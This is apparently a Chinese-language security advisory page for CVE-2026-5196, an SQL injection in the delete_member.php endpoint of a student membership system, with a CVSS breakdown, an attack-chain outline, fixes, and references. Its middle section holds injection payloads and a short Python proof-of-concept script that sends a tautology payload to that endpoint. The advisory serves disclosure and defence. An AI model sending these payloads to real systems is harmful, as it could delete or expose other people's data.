CVE-2026-5196 CVSS 6.3 中危

CVE-2026-5196: Student Membership System SQL注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5196

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Student Membership System

漏洞概述

code-projects Student Membership System 1.0版本被曝出存在SQL注入安全漏洞。该漏洞位于/delete_member.php文件中，主要由于程序未对用户输入的ID参数进行充分的过滤和验证。攻击者无需高权限即可远程利用此漏洞，通过精心构造的恶意SQL语句欺骗后端数据库，从而可能导致敏感数据泄露、数据被篡改或系统服务中断。鉴于该漏洞的利用代码已公开，对系统安全构成实质威胁。

技术细节

该漏洞的根源在于Student Membership System在处理删除成员请求时，未对用户输入的ID参数进行严格的类型检查或安全过滤。在/delete_member.php文件中，程序直接将用户提交的ID参数拼接到SQL查询语句中执行，例如 'DELETE FROM members WHERE id = ' . $_GET['ID']。这种不安全的编码方式使得攻击者能够通过注入单引号、注释符等SQL语法字符，改变原始查询的逻辑。攻击者可以利用UNION SELECT查询获取数据库结构，读取管理员密码哈希或其他敏感数据，甚至利用存储过程执行系统命令。由于CVSS向量显示攻击复杂度低且无需用户交互，该漏洞极易被自动化扫描工具发现并利用。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是code-projects Student Membership System 1.0，并定位到/delete_member.php接口。

STEP 2

武器化与交付

攻击者构造包含SQL注入语意的恶意Payload（如 ' OR 1=1 --），并将其作为ID参数值发送给服务器。

STEP 3

利用

服务器端后端脚本未过滤ID参数，直接将其拼接到SQL语句中执行，导致恶意SQL代码在数据库中运行。

STEP 4

影响

攻击者成功绕过认证或获取敏感数据库信息，可能导致数据泄露（C:L）、数据篡改（I:L）或服务受损（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL setup
target_url = "http://target-ip/path/delete_member.php"

# SQL Injection Payload
# This payload attempts to manipulate the query logic based on the ID parameter
# Example: Checking if the database responds to a true condition (1=1)
payload = {
    "ID": "1' OR '1'='1"
}

try:
    # Sending the malicious request
    response = requests.get(target_url, params=payload)

    # Analyzing the response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text[:500]) # Print first 500 chars for analysis
    else:
        print("[-] Request failed with status code:", response.status_code)

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

code-projects Student Membership System 1.0

防御指南

临时缓解措施

建议立即在应用网关处部署WAF规则，拦截针对delete_member.php的异常请求。同时，开发人员应尽快审查代码，将字符串拼接的SQL语句改为参数化查询，并在上线前对所有用户输入进行严格的类型检查和过滤。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5196
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5196
3 Details https://www.cvedetails.com/cve/CVE-2026-5196/
4 VulDB https://vuldb.com/cve/CVE-2026-5196
5 Link https://code-projects.org/
6 Link https://github.com/maidangdang1/CVE/issues/2
7 Link https://vuldb.com/submit/780399
8 Link https://vuldb.com/vuln/354294
9 Link https://vuldb.com/vuln/354294/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表